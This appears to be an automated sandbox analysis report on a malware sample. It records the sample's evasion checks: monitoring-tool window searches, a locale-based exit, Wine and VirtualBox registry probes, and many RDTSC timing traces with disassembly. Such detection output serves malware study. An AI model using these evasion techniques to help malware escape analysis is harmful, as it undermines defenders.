Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00AC9860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-48240

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1194B second address: D1194F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E90289 second address: E9029C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F4224DD3FD8h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9029C second address: E902AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F4224E6F2A6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E902AB second address: E902AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8F51D second address: E8F521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8F6AC second address: E8F6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4224DD3FDDh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8F9A4 second address: E8F9CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F4224E6F2BEh 0x0000000b popad 0x0000000c push edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8FB48 second address: E8FB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4224DD3FD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8FB54 second address: E8FB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8FB5D second address: E8FB69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F4224DD3FD6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E92E73 second address: D1194B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 09AF6F71h 0x0000000c jmp 00007F4224E6F2B0h 0x00000011 push dword ptr [ebp+122D1759h] 0x00000017 jmp 00007F4224E6F2AAh 0x0000001c call dword ptr [ebp+122D26F5h] 0x00000022 pushad 0x00000023 pushad 0x00000024 mov ecx, dword ptr [ebp+122D3575h] 0x0000002a pushad 0x0000002b mov dword ptr [ebp+122D1A00h], ebx 0x00000031 jmp 00007F4224E6F2ACh 0x00000036 popad 0x00000037 popad 0x00000038 xor eax, eax 0x0000003a stc 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f or dword ptr [ebp+122D1A00h], edx 0x00000045 mov dword ptr [ebp+122D35B1h], eax 0x0000004b pushad 0x0000004c mov dword ptr [ebp+122D1A00h], esi 0x00000052 movzx ecx, si 0x00000055 popad 0x00000056 mov esi, 0000003Ch 0x0000005b jne 00007F4224E6F2B9h 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 jbe 00007F4224E6F2A7h 0x0000006b stc 0x0000006c lodsw 0x0000006e pushad 0x0000006f mov dword ptr [ebp+122D2631h], ecx 0x00000075 movzx edi, di 0x00000078 popad 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d jmp 00007F4224E6F2B7h 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 jng 00007F4224E6F2ACh 0x0000008c or dword ptr [ebp+122D1A00h], ebx 0x00000092 nop 0x00000093 jmp 00007F4224E6F2B7h 0x00000098 push eax 0x00000099 pushad 0x0000009a push eax 0x0000009b push edx 0x0000009c push eax 0x0000009d push edx 0x0000009e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E92EC0 second address: E92ECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4224DD3FD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA48D3 second address: EA48EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4224E6F2B5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E87883 second address: E8788D instructions: 0x00000000 rdtsc 0x00000002 js 00007F4224DD3FD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8788D second address: E87893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB2275 second address: EB228F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F4224DD3FDBh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F4224DD3FD6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB228F second address: EB2293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB26F4 second address: EB26F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB26F9 second address: EB26FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB2849 second address: EB2855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4224DD3FD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB2863 second address: EB287E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4224E6F2AAh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F4224E6F2A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB287E second address: EB2882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB2B02 second address: EB2B12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224E6F2ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB2B12 second address: EB2B5A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnl 00007F4224DD3FD6h 0x00000009 jmp 00007F4224DD3FE7h 0x0000000e pop ecx 0x0000000f jmp 00007F4224DD3FE7h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jno 00007F4224DD3FD8h 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB34DD second address: EB34E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB34E2 second address: EB34EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB34EB second address: EB3508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4224E6F2ADh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB3508 second address: EB3515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F4224DD3FD8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB3A7F second address: EB3AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4224E6F2AFh 0x00000009 popad 0x0000000a jbe 00007F4224E6F2B9h 0x00000010 jmp 00007F4224E6F2ADh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB3AA8 second address: EB3AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB6A28 second address: EB6A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4224E6F2AAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB6A36 second address: EB6A3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB71DA second address: EB71DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB978B second address: EB9790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9790 second address: EB9797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9797 second address: EB97B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F4224DD3FD8h 0x0000000f push eax 0x00000010 push edx 0x00000011 pop edx 0x00000012 jne 00007F4224DD3FD6h 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBFF51 second address: EBFF81 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4224E6F2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4224E6F2B4h 0x0000000f jc 00007F4224E6F2B6h 0x00000015 jmp 00007F4224E6F2AAh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBF3D8 second address: EBF3DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBF3DC second address: EBF3E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBF3E8 second address: EBF3FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4224DD3FDDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBF3FB second address: EBF416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F4224E6F2B5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBFDB6 second address: EBFDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBFDBA second address: EBFDBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBFDBE second address: EBFDF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4224DD3FE4h 0x0000000c push edi 0x0000000d pop edi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 jmp 00007F4224DD3FE5h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC0A39 second address: EC0A5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F4224E6F2B5h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC17BB second address: EC183A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224DD3FE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F4224DD3FDCh 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F4224DD3FD8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b or dword ptr [ebp+122D1AD2h], ecx 0x00000031 pushad 0x00000032 stc 0x00000033 jng 00007F4224DD3FDCh 0x00000039 popad 0x0000003a xchg eax, ebx 0x0000003b jno 00007F4224DD3FE4h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 jp 00007F4224DD3FD6h 0x0000004b jno 00007F4224DD3FD6h 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC183A second address: EC1844 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4224E6F2ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC1D67 second address: EC1E04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4224DD3FE7h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 jmp 00007F4224DD3FDFh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F4224DD3FD8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 sub esi, dword ptr [ebp+122D2651h] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007F4224DD3FD8h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 or dword ptr [ebp+122D19C0h], edx 0x00000059 movzx edi, di 0x0000005c xchg eax, ebx 0x0000005d push ebx 0x0000005e pushad 0x0000005f jmp 00007F4224DD3FE0h 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC1E04 second address: EC1E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC272B second address: EC272F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC272F second address: EC2733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC3878 second address: EC390E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F4224DD3FDFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F4224DD3FD8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a sbb di, C24Ah 0x0000002f push 00000000h 0x00000031 jo 00007F4224DD3FE3h 0x00000037 call 00007F4224DD3FDCh 0x0000003c pop edi 0x0000003d push 00000000h 0x0000003f call 00007F4224DD3FE5h 0x00000044 mov dword ptr [ebp+122D1C95h], ebx 0x0000004a pop edi 0x0000004b xchg eax, ebx 0x0000004c jmp 00007F4224DD3FE7h 0x00000051 push eax 0x00000052 je 00007F4224DD3FE0h 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC3023 second address: EC302D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4224E6F2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC4101 second address: EC4106 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC4106 second address: EC410C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6DDA second address: EC6E70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224DD3FE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F4224DD3FD8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 pushad 0x00000025 push edi 0x00000026 mov edx, ebx 0x00000028 pop edx 0x00000029 add bl, FFFFFFFFh 0x0000002c popad 0x0000002d js 00007F4224DD3FDCh 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007F4224DD3FD8h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f jmp 00007F4224DD3FE4h 0x00000054 push 00000000h 0x00000056 mov dword ptr [ebp+12455C64h], ebx 0x0000005c push eax 0x0000005d jo 00007F4224DD3FE0h 0x00000063 pushad 0x00000064 pushad 0x00000065 popad 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC5697 second address: EC56AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224E6F2AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECB26A second address: ECB26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECB800 second address: ECB85D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4224E6F2B3h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F4224E6F2A8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 je 00007F4224E6F2A6h 0x0000002f push 00000000h 0x00000031 mov ebx, dword ptr [ebp+122D23A8h] 0x00000037 push 00000000h 0x00000039 add di, 4B82h 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F4224E6F2ABh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECB85D second address: ECB88C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4224DD3FE0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4224DD3FE4h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECC8BF second address: ECC8C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECEA34 second address: ECEA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECCAB1 second address: ECCAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECEA3F second address: ECEA43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECEA43 second address: ECEA5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4224E6F2B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECCAB5 second address: ECCAB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECEA5C second address: ECEA83 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4224E6F2BEh 0x00000008 ja 00007F4224E6F2A6h 0x0000000e jmp 00007F4224E6F2B2h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECEA83 second address: ECEA96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jno 00007F4224DD3FD6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECEA96 second address: ECEA9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECEA9E second address: ECEAB2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007F4224DD3FD6h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jnc 00007F4224DD3FD6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED00C6 second address: ED00CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED10E2 second address: ED10E8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED10E8 second address: ED10ED instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED10ED second address: ED110B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4224DD3FE4h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED110B second address: ED1111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED11AF second address: ED11B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED11B3 second address: ED11BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3120 second address: ED3129 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED47AB second address: ED47B5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4224E6F2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
